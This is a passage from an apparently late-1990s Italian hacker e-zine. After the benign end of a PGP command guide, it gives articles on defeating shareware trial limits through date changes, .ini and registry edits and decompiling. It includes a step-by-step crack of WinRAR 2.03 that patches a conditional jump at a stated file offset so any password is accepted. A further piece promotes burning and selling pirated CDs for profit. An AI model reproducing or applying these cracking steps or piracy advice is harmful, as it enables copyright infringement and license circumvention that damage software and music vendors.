firme da un ID in un portachiavi: pgp -krs ID [portachiavi] Per revocare permanentemente la vostra chiave, rilasciando un certificato di compromissione: pgp -kd mio_ID Per disabilitare o riabilitare una chiave pubblica nel vostro portachiavi pubblico: pgp -kd ID Comandi esoterici: Per decifrare un messaggio e lasciarne la firma intatta: pgp -d filecifrato Per creare un certificato di firma separato dal documento: pgp -sb filetesto [-u mio_ID] Per staccare il certificato di firma da un messaggio firmato: pgp -b filecifrato Opzioni di comando da usare in combinazione con altre (formando a volte parole interessanti!) Per produrre un file cifrato in formato ASCII radix-64, aggiungere l'opzione -a quando lo si cifra, lo si firma, o si estrae una chiave: pgp -sea filetesto dest_ID o: pgp -kxa ID filechiavi [portachiavi] Per cancellare il testo in chiaro dopo averlo cifrato, aggiungere l'opzione -w (wipe) quando lo si cifra o lo si firma: pgp -sew lettera.txt dest_ID Per specificare che un testo in chiaro contiene solo testo ASCII, non binario, e che dovra' essere convertito in testo dal destinatario, aggiungere l'opzione -t (text) alle altre: pgp -seat lettera.txt dest_ID Per vedere il testo decifrato sullo schermo senza salvarlo in un file, come con il comando "more", usare l'opzione -m (more) quando si decifra: pgp -m filecifrato Per specificare che il destinatario potra' SOLO vedere il testo decifrato, e non salvarlo su disco, aggiungere l'opzione -m: pgp -steam lettera.txt dest_ID Per recuperare il nome originale del file di testo quando lo si decifra, aggiungere l'opzione -p: pgp -p filecifrato Per usare un filtro tipo Unix, leggendo da uno standard input e scrivendo in uno standard output, aggiungere l'opzione -f: pgp -feast dest_ID <inputfile >outputfile CONSIDERAZIONI FINALI Questa sopra e' una breve, scheletrica, semplice guida all'uso di uno dei piu' bei (mamma mia) programmi che siano stati realizzati, fatene buon uso e sappiate che si possono fare tante altre cose con il PGP come certificare, verificare l'integrita' di un documento....... Se cercate in rete troverete centinaia di informazioni, io vi consiglio la guida di Giorgio Chinnici (ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/PGPINTRO-ITALIAN.ZIP) e il magico Kriptonite....(non ricordo il sito ma se scrivete ve lo mando). Fate molte prove all'inizio e non cercatemi se vi fottete l'HD :))) e poi usatelo, usatelo, usatelo e sappiate che se credete veramente nella liberta' d'espressione oggi qualche preoccupazione dovreste averla.....qui ci loggano ovunque.....quindi usatelo anche se non avete nulla da nascondere in modo che il mondo non si stupisca e non si allarmi se qualcuno cerca di difendere un proprio diritto (a volte capita)..... Nietzcshe [email protected] bye ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°² ²°°°ÛÛ°°°°ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°² ²°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°² ²°°°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°² ²°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ --------/ //\\ //\\ /\\ //\\ || // \------------------ ®®®®®®® || || // // \\ || ||// f0r BeGiNN&rS ®®®®®®®® - ®®®®®®® || || \\ //^ ^\\ || ||\\ by ZioFill ®®®®®®®® --------\ \\// || \\// \\\\ // || \\ /------------------------------------------------------¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ quanto mi arrapa fare questi disegnini.... Prima di tutto voglio dire ke il sottoscritto, di Cracking, sa molto poko, (doh) anke se sto cerkando di imparare ;quindi in questo artikolo non troverete altro ke semplici trukketti ke ho imparato nella mia gioventu' sprekata davanti allo skermo. Queste "PeRLe dI sAgGezza", non hanno niente a ke vedere con il Cracking vero e proprio quindi se qualke Cracker legge questo artikolo ( ne dubito fortemente) non si Skandalizzi troppo se ritiene ke abbia sparato qualke kakkiata di troppo.... BiSogna pero' dire ke kon qualke modifika al registro del karo WinTozzen o con un pikkolo ritokko al kontenuto di alkuni .ini si fottono tranquillamente molte ( piu' di quante crediate ) di quelle bastardissime sharewere ke Expirano dopo un tot di giorni ( 30 di solito ) o un determinato numero di Avvii ( 10-12 di solito ). Inoltre kon questi sistemi si evitano lunghe ricerke di crack per programmi skonosciuti ke, guardacaso, interessano proprio a noi... : [ Ringrazio NewBies per avermi dato la possibilita' di scrivere il mio primo artikolo su questa rivista ( anzi il mio primo artikolo e basta ) e vi avviso ke per gli eventuali kommenti, critike, correzioni, dikiarazioni di diversita', rikieste di partecipazione al film CASA BLANKA ecc. potete scrivermi o contattarmi in ICQ ( il mio UIN e' 18576460 ).... premesso questo kredo sia il kaso di kominciare. Allora, il primo modo ( il piu' zemplice ) per fregare le nostre belle protezioni e' quello di kambiare la data di sistema ( evviva il Crack avanzato : ). ( per gli esperti: basta doubleClikkare sull'ora nella barra di Win95/98), infatti molti programmi all'installazione non fanno altro ke registrare ( vedremo poi dove) il giorno korrente e fare il calcolo di quando il programma dovra' expirare... Sembra una kazzata ma kon questo trukketto mi sono fatto mezzo sito prima di trovare il crack apposito per FrontPage.... Ovviamente e' soltanto una soluzione temporanea intanto ke non trovate il crack o lavoriate a qualke sistema piu' dignitoso. Un'altro metodo per fregare le nostre belle Sharewere eXpiranti e' quello di andare a modificare, kome dicevo prima, i files .ini, ma ke kakkio sono gli ini (gli esperti domandano)? Ebbene gli .ini non sono altro ke dei file in formato testo ( apribili e modifikabili quindi kon NotePad) ke un programma legge all'avvio per raccattare alkune informazioni, precedementemente settate da voi o di default.( spiegazione kiara&Zemplice ) Un esempio di file .ini, e' Win.ini ke kontiene, appunto, le informazioni per il karikamento del beneamato&Rispettato Sistema Operativo WinKazze & anke quelle di alkuni programmi ( mi pare ke tra questi vi sia anke WinZip ), e quindi e' sempre meglio dargli un okkiata. Ma dove si trovano di solito questi simpatikoni (kiedono insistentemente sempre gli stessi esperti )? Ebbene di solito si trovano o nella stessa kartella del programma oppure in quella di WinDouZzz &,a volte, hanno lo stesso nome del programma a cui si riferiscono ( kakkio ma sono intelligenti sti programmatori... : ) komunque e' konsigliabile, fare sempre un bel "TRova" => *.ini ke non si sa mai ke gli amiketti siano in cartelle sconosciute con nomi inimagginabili per le menti dei komuni mortali ( quelli della mikrosoft sopratutto ,anke se non sembrerebbe, hanno una fantasia insuperabile....) quindi probabilmente si chiameranno kon la sigla del programma e il numero della versione o kose del genere. Per trovare gli .ini potete provare anke ad editare il file .log ke troverete nella stessa cartella del programma ( serve all'unistaller dell'applicazione per sapere quali files dovra' cancellare ) ke non si sa mai ke vi sia proprio kuello ke stiamo cerkando (raro, komunque provate). 0k, ora, una volta trovato sto kazzo di .ini ke si fa? E' zemplice, basta editarlo ( kon Notepad o kon quel kakkio ke vuoi ), e cercare le righe piu' interessanti.... Ad esempio guardate dove c'e' scritto qualcosa tipo RUN COUNT seguito da = e un numero, o qualcosa di simile, in caso avviate il programma e riguardatevi l'ini per vedere kosa e' kambiato, o fate un po' voi; una volta trovata la riga desiderata fate una kopia dell'ini in questione e provate a modificarlo a vostro piacimento. Ad esempio se il numero dopo RUN COUNT e' diminuito dopo l'avvio del programma aggiungete o, se al contrario e' aumentato, diminuitelo... non e' komplikato giusto? Alkuni programmi, invece ke salvare le proprie impostazioni in qualke ini sperduto, utilizzano il registro di WinZoZZ&N.... Ma dove kakkio e' il registro? ( sono sempre loro ) per poter controllare cio' ke e' salvato nel registro basta andare nella directory di Win e clickkare su regedit.exe, oppure, piu' semplicemente eseguire regedit dalla barra delle applikazioni del nostro karo O.S. Una volta fatto cio' vi komparira' una finestra kon un bel tree ( deh hi ho ) a sinistra kontenente le seguenti kartelle: - • Risorse del computer |+ • HKEY_CLASSES_ROOT |+ • HKEY_CURRENT_USER |+ • HKEY_LOCAL_MACHINE |+ • HKEY_USERS |+ • HKEY_CURRENT_CONFIG |+ • HKEY_DYN_DATA o kualkosa del genere, a questo punto dobbiamo cercare dove esattamente nel registro il programma si segna quando dovra' Expirare o quante volte lo abbiamo avviato. Anke qua, kome negli .ini, la kosa puo' rivelarsi piuttosto Z&Mþliœ se il programma salva le impostazioni sotto una chiave ( credo ke si kiamino kosi' le "cartelle" del registro ) con il suo stesso nome, ed in questo kaso troverete probabilmente cio' ke cercate in: - • Risorse del computer |+ • HKEY_CLASSES_ROOT |- • HKEY_CURRENT_USER |+ • Software |+ • nome del programma |+ • HKEY_LOCAL_MACHINE |+ • HKEY_USERS |+ • HKEY_CURRENT_CONFIG |+ • HKEY_DYN_DATA ( cioe' in HKEY_CURRENT_USER => Softwere => nome del programma ) Se non e' cosi' allora la kosa potrebbe rivelarsi piu' incasinata del previsto. : | In ogni caso, visto ke il simpatiko registro ci mette a disposizione l'opzione "Trova", tanto vale utilizzarla, provando un po' di nomi inerenti al programma (sigla o roba simile ), e vedere se trova qualkosa da qualke parte. Se non fosse cosi' non rimane altro da fare che cercare manualmente ( DOH :))). In questa ricerka vi possono aiutare alkune utility kome regmon ( ke dovrebbe essere allegata a questo artikolo ) ke non fanno altro ke registrare tutte le modifiche apportate al registro da un determinato programma e mostrarcele ( mi pare ke anke le Utilities del buon Dottor Norton abbiano una funzione simile da qualke parte ). A questo punto non dovete fare altro ke avviare il programma e guardare su regmon ( o su dove kakkio volete ), dove va' a leggere la Shareware quando controlla se la copia e' Expirata o meno. Nel kaso di RegMon troverete un kasino di stringhe del genere: ( app. vi konsiglio di Disattivare subito "Capture Events" per poi attivarlo quando vorrete far partire l'applicazione e capirete poi il perche' ) # | Process | Request 365 .. Wb98 | OpenKey Path HKLM\Softwere\Microsoft\.. | Result | Other Success Cioe': ~~~~~~~~~~~~~~D~E~H~~H~I~~H~O~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # = Numero processo. Process = Nome dell'applicazione ke l'ha eseguito. Request = Rikiesta da parte dell'applikazione. Path = Dove e' andato a leggere nel registro. Result = Se la rikiesta fatta e' andata a buon fine o meno. Other = Altro. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Una volta ke avete la lista di tutti i processi avvenuti, ( scartate subito quelli di Explorer ), non dovete fare altro ke guardare dove e' andato a leggere nel registro ( guardate sotto Path )il nostro bel programmino. Se alla fine di tutto cio' siete riusciti a trovare la kiave in cui vengono salvati i valori da noi cercati ( come la data in cui il programma morira' o quanti avvii vi rimangono ), e kambiare il valore ( nella parte destra di regedit ) in modo da avere crediti illimitati o ritardare la morte della sharewere. Se non siete riusciti ne kon gli ini, ne kon il registro non disperate ci sono altre soluzioni. Infatti potreste cercare di kapire kon ke kosa e' stato programmato il suddetto program ( Visual Basic, C++, ecc. ) ed agire di konseguenza procurandovi un dekompilatrore Appozito. Ma ke e' un Dekompilatore? Ebbene, ( e ditemi se sbaglio ) ogni programma prima di essere un exe e' un progetto, cio' ke fa un compilatore e' rendere questo progetto in un exe, e il dekompilatore rende, logikamente, un exe in progetto. Una volta ke abbiamo il progetto possiamo fare tutto quello ke vogliamo. faccio un esempio, se ho una sharewere ke sekondo me e' stata kompilata in VB allora mi procuro il dekompilatore Vb e naturalmente Visual Basic ( maddai???? ) una volta fatto questo si dekompila il prog. & basta dare un'occhiata al codice per capire quando va a controllare se l'userId e la password ke inseriamo per registrarci e' korretta e quindi agire di konseguenza... ( Se non konoscete il linguaggio in questione non vi preoccupate, vi assicuro ke non serve essere degli esperti programmatori per fare cio' ke vogliamo fare....) Inoltre avendo un programma decompilato avete il vantaggio di poter fare qualke modifika al look o kose del genere ( La Violazione di CopRight e' una kosa bastarda e immorale ma divertentissima...., P.S. in fondo se non distribuite la roba ke modifikate ki kakkio volete ke venga a rompervi i koglioni?) app. Se possedete il divino VB, provate a mettere il programma ke volete rendere immortale in un OLE, non kiedetemi perke' ma a volte il kontatore non va' o komunque la sharewere non riesce a suicidarsi. E se invece Vb non lo possedete potete ottenere risultati simili ( kredo ) settando l'exe in sola lettura, ma non vorrei sbagliarmi. Altri programmi, addirittura, non contenti di segnarsi l'expirazione (una volta avvenuta ) in qualke ini o nel registro, vanno a tokkarci il Bios ( Bastardi }=\\. ( Quando delle applikazioni usano questo tipo di protezione Ve ne accorgete subito ,perche', se provate a: disinstallarli, cancellare tutti gli ini a loro riferiti, eliminare tutte le kiavi nel registro ke potrebbero, anke lontanamente, riferirsi a loro, quando li rEinstallerete all'avvio vi ritroverete ankora con il vostro shareware passata a miglior vita... ke fare? Qui la kosa si fa piuttosto komplikata, infatti, a quanto so' ci sono in giro dei programmini ke permettono di interagire kon il Bios potendo kancellare i dati kontenuti ma qui rientriamo nel VERO Crack. Si puo' interagire kon il Bios all'avvio del cpu, premendo canc ma non kredo ke da li otterete molto. Quindi, kon questi tipi di protezioni konviene, kome dicevo anke prima, dekompilare brutalmente, ed eliminare la parte in cui va a leggere l'expirazione nel bios ( ma sinceramente e' un metodo ke non ho mai provato kon questo tipo di protezione quindi non posso assikurarvi niente ) oppure provare a modifikare i files dell'installazione.... komunque, oltre a provare i metodi ke vi ho indikato sopra, vi konsiglio di editare sempre tutti i file kontenuti nella cartella del programma ( kompresi quelli dell'installazione ) kon Notepad, che magari kon un po' di fortuna ( anzi mooooolta fortuna ) riuscite a kombinare kualkosa o, komunque, a racimolare informazioni preziose. E kon questo e' finito e si kiude l'era di kosi kom'e'... e se ne riapre un'altra.... e sono kazzi tuoi.... {A31} Deh hi ho ringrazio ankora la NewBies per la possibilita' offertami e ki ha letto questo artikolo, kome ho gia' scritto all'inizio i komment di ogni tipo sono ben accetti, bazta scrivermi. saluto inoltre: SKiZzO, Caratt, Ripper, nEcRoSoFt, Alan, Carlitos ( Mazzu ), tozzo, skott, -sAnto-_-sAtAnello- , Pippo, New Avator, TOTILA, RedFly, Homer J. Simpson, Matt Groening & quanti ora non rammento... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ¿¿¿¿¿¿¿¿Z I O F I L L@@HomAPaGia: http://members.tripod.it/ZioFill ¿¿¿¿¿¿¿¿¿¿¿ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NOTA BY N0bodY88 = speriamo che questo sia solo il primo di una lunga serie di articoli....ciauz ZioFill :)))) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ CRACKING QUESTO SCONOSCIUTO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Chi di voi non ha mai scaricato un crack? Tu, tu e tu, FUORI! E chi di voi non si e' mai chiesto come venissero fatti questi utilissimi programmini? Ok, voi che avete alzato la mano, fuori anche voi! Chi di voi non sa cos'e' l'assembler, una decompilazione, un offset o un hex-editor? Ok, fuori e non rientrate finche' non vi sarete documentati. Fatta questa breve premessa, bisogna iniziarne un'altra :P Chi vuole diventare un cracker deve sapere le basi. Tutti possono dire "io so cosa e' un crack", ma il cracking vero non e' fatto a scopo di lucro, bensi' solo per sfida o per poter testare un programma a fondo senza essere annoiati da schermate scassapalle con scritto "Registrami!". Se un programma vi piace, COMPRATEVELO! Per esempio, io Windows98 non l'ho comprato ;) ma Commandos si'! Inoltre se volete crackare qualcosa, scaricatevi dei programmi vecchiotti e crackate quelli, per un motivo che vi spieghero' subito. Gli schemi di protezione + o - sono sempre gli stessi: scrivi una password, ammacca OK appena spunta il nag screen, ecc. Mai nessuno progetta delle vere e proprie protezioni sicure dai cracker. Percio' sapendo come crackare le protezioni piu' vecchie, potrete crackare quelle piu' nuove, avendo la necessaria base di conoscenza, visto che le variazioni rispetto alle protezioni piu' vecchie sono minime. Inoltre cercate di crackare dei giochi. Infatti per i giochi mettono SEMPRE protezioni piu' difficili delle altre. Queste protezioni una volta "passate di moda" vengono utilizzate per i comuni programmi shareware. Per fare un esempio ipotetico potreste trovare la protezione di Commandos (che si basa sull'inserimento nel CD originale di file fasulli delle modeste dimensioni di 1 Gb l'uno) nel Photshop 6.0 (che ancora non esiste). Sapendo quindi come si cracka, sarete i primi a rilasciare un crack! Bello no ;) ? Comunque, passiamo in rassegna i principali tipi di protezione e il loro modo di sprotezione: 1) Protezioni con password, serial, o altri codici numerici, alfanumerici o letterali Metodo di sprotezione: Basta disassemblare il tutto e invertire i jump, vi spieghero' cosa vuol dire nel tutorial sul cracking 2) Protezioni con Nag-Screen Bisogna trovare la routine che chiama il Nag e disabilitarla col comando NOP 3) Protezioni con contatori di tempo o di giorni Bisogna trovare il metodo in base al quale fanno salire il contatore. Puo' essere il compare tra una variabile che indica il tempo massimo e il tempo attuale, o altre schifezze... 4) Protezioni su CD o Diskette Cheking, ossia controllo del CD o del dischetto nel drive Basta NOPpare le chiamate ai controlli sui drive o eliminarle del tutto dal codice. 5) Protezioni basate su Dongle (chiave hardware) Ehm...ca**o queste sono difficilotte da crackare, perche' bisogna o emulare le funzioni del dongle via software, o peggio ancora, sono incrackabili se non clonando il dongle...la nostra fortuna e' che produrre chiavi hardware costa molto alle software house, che per ridurre i costi e fare maggiori guadagni si limitano alle pass...tutto a nostro favore ihihihih... 6) Protezioni che disabilitano alcune funzioni del software Un tipo di protezione che, siceramente, non ho mai incontrato. Dai pochi documenti che ho letto su questo argomento ne ho dedotto che sono a volte facili, a volte difficili, ma sinceramente non capisco come si possano attivare delle funzioni...muaH... Io, dal basso della mia esperienza (che vi credete, sono un newbie anche io!! :), posso essere credibile solo per il primo tipo di protezioni, visto che sono le piu' facili, e visto anche che tutti gli altri tipi richiedono il Soft-Ice (che comunque oggi 5/3/1999 mi son fatto passare, grazie N0bodY :). Allora, prima di tutto ogni cracker ha i suoi attrezzi. Come ogni bravo artigiano ha seghe, martelli, pialle noi abbiamo disassemblatori, debuggers, hex-editors. I primi servono a disassemblare un programma, ossia decompilare un programma in modo da portarlo in assembler. Avere il listato di un programma in assembler e' utilissimo, visto che grazie al WDasm 8.93 (ovviamente crackato ;), cioe' il nostro disassemblatore di fiducia, possiamo, grazie ad alcune ricerche facili e veloci, scoprire il serial, oppure fare in modo di editare il programma cosi' che qualunque pass noi mettiamo il programma la accetta. Immaginatevi che bello: "Winxxxx Registered to: <inserisci il tuo nome o nick> Serial: i'm an evil cracker and hax0r" che figurone con gli amici no? Il debugger e' una cosa ESSENZIALE nei crack piu' difficili. Infatti grazie al debugger (il migliore e' senza dubbio il Soft-Ice) possiamo impostare dei Breakpoint detti in gergo BPX, ossia delle "interruzioni su procedura", ossia interruzioni che si verificano al momento di inserire il codice o altro. Per esempio se noi al prompt nostro Soft-Ice scriviamo "BPX GetWindowTextA" appena verra' chiamata la procedura GetWindowTextA (che e' una procedura di una API di Windows, che serve a prendere un testo da una dialog) il debugger blocchera' tutto mostrandovi quello che il programma da crackare stava per fare...cosi' che voi possiate agire di conseguenza :) Gli hex-editors, beh, se non li conoscete ritiratevi, il mestiere di cracker non fa per voi. Ma passiamo adesso al tutorial!!! TUTORIAL No.1: COME CRACKARE IL WINRAR95.EXE (VER 2.03) Mmm, la prima cosa da fare e' procurarsi i necessari tools. Andate al sito www.crackstore.com e nella sezione tools scaricatevi il Wdasm 8.93 e l'Hiew 6.00. Se ci sono versioni piu' recenti non fate i lamer0ni e dite "ahhhhh non e' quello che hai detto tu percio' non lo prendo", ma arraffateli lo stesso. Allora, dopo avere preso i proggie installateveli (ossia scompattateli dove vi pare e piace) e createvi due copie di WINRAR95.EXE, una la chiamate WINRAR95.<estensione che vi piace> e un'altra WINRAR95.W32. Adesso aprite il Wdasm, premete il primo bottone sulla toolbar (che sarebbe apri file da disassemblare), andate nella directory del WinRAR e disassemblate il file WINRAR95.W32. Finita la disassemblazione attivate il WINRAR95.EXE e cercate di registrarvi inserendo Username e Password a vostro piacimento (io, tanto per farvelo sapere, metto sempre come Username Satana e come Password 666). A meno che non abbiate un kulo di dimensioni bibliche vi apparira' una finestrella con scritto "Registration Failed". Memorizzate o scrivetevi il messaggio della finestra di testo e tornate al Wdasm. Cliccate sul penultimo bottone, quello con scritto "Strn Ref". La pressione di questo bottone fara' apparire la lista delle stringhe di testo inserite nel programma. Fra queste cercate il vostro "Registration Failed" e fateci doppio clic. Noterete che il cursore si spostera' ad una certa riga, chiudete la finestrella delle String References e salite di un paio di righe con freccia su. Vi faccio lo schemino di come dovrebbe essere il vostro schermo a questo punto: * Possible Reference to String Resource ID=00106: "Registration Failed" | :00413A8F 6A6A push 0000006A :00413A91 E863640000 call 00419EF9 e poi altre tre righe. Adesso abbiamo trovato il posto dove andate a finire quando immettete una pass sbagliata. E qui entra in gioco uno dei principi fondamentali dell'assembler: i programmi vengono letti dall'alto in basso. Questo significa che il jump che dobbiamo cambiare sara' SEMPRE prima della stringa "Registrazione fallita". Quindi saliamo col cursore per un po' di righe. Ad un certo punto ci troveremo davanti ad una schermata interessante: * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00413A51(C) | :00413A6D 8D9554FFFFFF lea edx, dword ptr [ebp+FFFFFF54] altre righe di codice... :00413A82 74DF jne 00413AB3 Questo "Referenced by..." imparerete ad amarlo. Significa che tutta la serie di procedure che dicono che il vostro serial fa schifo partono proprio dal "Jump if not equal" 00413A82...eheheheheh...Abbiamo quasi finito. In pratica questo jne vuol dire questo: se il codice e' diverso da quello giusto, vai e dimmi che non va. Allora, qui sta il crack: cambiamo il jne in je. In pratica: se il codice e' diverso da quello giusto, registrami...adesso selezionate con il cursore la riga con jne. La riga evidenziatrice passera' da blu a verde. Adesso guardate in fondo alla finestra di Wdasm, dovrebbe apparire una riga piu' o meno cosi': Line:35097 Pg 702 and 703 of 1501 Code Data @: 00413A82 @Offset 00013082h in File:Winrar95.w32 Segnatevi l'offset togliendo tutti gli zeri e la h finale (13082) e aprite Hiew. Andate nella dir del WinRar e aprite il file WINRAR95.EXE. Appariranno una serie di strani caratteri e altre porcherie, ma voi che siete cracker premete F4, selezionate DECODE e premete Invio. Magia! Appare il codice assembler di WINRAR! Premete F5, inserite il vostro offset, ossia 13082, e premete Invio. Vi apparira' una schermata del genere: .00413A82: 752F .00413A84: 6A30 jne push .000413AB3 030 -------- (1) Il 75 sara' selezionato, e voi premendo F3 lo potrete cambiare. Cambiatelo in 74, premete F9 e poi F10. Allora, spighiamo cio' che abbiamo fatto: cambiandolo in 74 abbiamo inserito un "je", quindi abbiamo crackato il programma in modo che accetti ogni pass. Com F9 abbiamo salvato e con F10 siamo usciti da Hiew. Adesso arriva la prova finale...eseguite WINRAR95.EXE e immettete un qualunque Username e Password, a vostra scelta. Se appare la scritta "Thanks for supporting", siete a cavallo! Il programma e' crackato, FESTA, EVVIVA! Chiudete e riavviate il WINRAR: bum, in alto e' riapparsa la scritta (evaluation copy)...DOH...ma cosa puo' essere successo? Semplice, se il codice non e' quello giusto, il programma si registra comunque, ma rimane la scritta (evaluation copy) in alto, e cio' non e' professionale! Allora, compito per casa: togliete la scritta! Per aiutarvi vi dico che servono ancora le String Reference e il cambio di un jump...se non ci riuscite al primo colpo, andate a tentavi: cambiate prima un jump, poi un altro e cosi' via. Se proprio non doveste riuscirvi, nel prossimo numero di Newbies ci sara' la soluzione... SpYmAsTeR (or SpYm4sT3R) [email protected] (P.S. per nobody: ho una correzione, nello scorso numero avete che scritto che per velocizzare i dcc bisogna scrivere /pdcc 99999999999, ma la miglior combo e' questa: prima si mette /fsend on e poi /pdcc 2147483647 il numero 2147483647 e' il migliore in assoluto, e' il valore massimo possibile, mentre 999999999 lo ridurrebbe...e stai trankuillo che funzia di brutto...2.5 Kb/sec su dcc...con 3 explorer e 2 dload aperti) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ MASTERIZZARE CHE PASSIONE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Rieccoci qua'.Bene, sappiamo tutti che masterizzare cd e' illegale ma frutta un bel po' di soldi. Per quanto mi riguarda continuero' a fare questo lavoro fino a che " non me vengono a piglia' ", dato che in tre mesi sono riuscito a riprendere i soldi del mio masterizzatore. Se volete acquistare un masterizzatore SCSI (che e' il migliore) dovete mettere da parte circa un milione. Se la cifra vi sembra un po' alta, non disperate perche' ci sono anche i masterizzatori EIDE che sono un po' piu' lenti degli altri ma vanno bene ugualmente. Il miglior masterizzatore EIDE e' sicuramente il MITSUMI cr280 che si aggira intorno al mezzo milione. Bene, una volta scelto il masterizzatore ci vuole un programma adatto per ogni duplicazione : per i tuoi progetti personalizzati, per cd muscali, per i cd con programmi o giochi, per giochi playstation. Io vi consiglio tre programmi : - To go 4.5 - Easy CD Creator - Nero. Quest' ultimo e' di sicuro il migliore per la duplicazione dei cd playstation. Questi programmi li potete scaricare da http://www.poli.studenti.to.it/software/mast95.htm Adesso diamo un'occhiata ai cd. Per quelli musicali vi consiglio i Silver che sono molto economici e hanno una buona registrazione, se avete un cliente pignolo allora dovrete usare i TDK CD-R74 che sono senza dubbio i migliori anche se costano sulle 3'500 lire cadauno. Io uso i Silver che costano la meta', cosi' ci guadagno il doppio, ehhh. Per i Playstation invece ci vogliono esclusivamente 3 marche : - i TRAXDATA; - i SONY; - i TDK REFLEX. Per gli altri tipi di masterizzazione un CD vale l'altro, quindi prendete quelli piu' economici. Vi ricordo che e' consigliabile registrare i CD musicali a 1X mentre per tutti gli altri a 2X va benissimo. Ecco tutto, ci vediamo alla prossima !!! KaOsS ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°°°°°°°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°°°°ÛÛÛÛ°°°°°°°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛ°°°°ÛÛ°°°°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°² 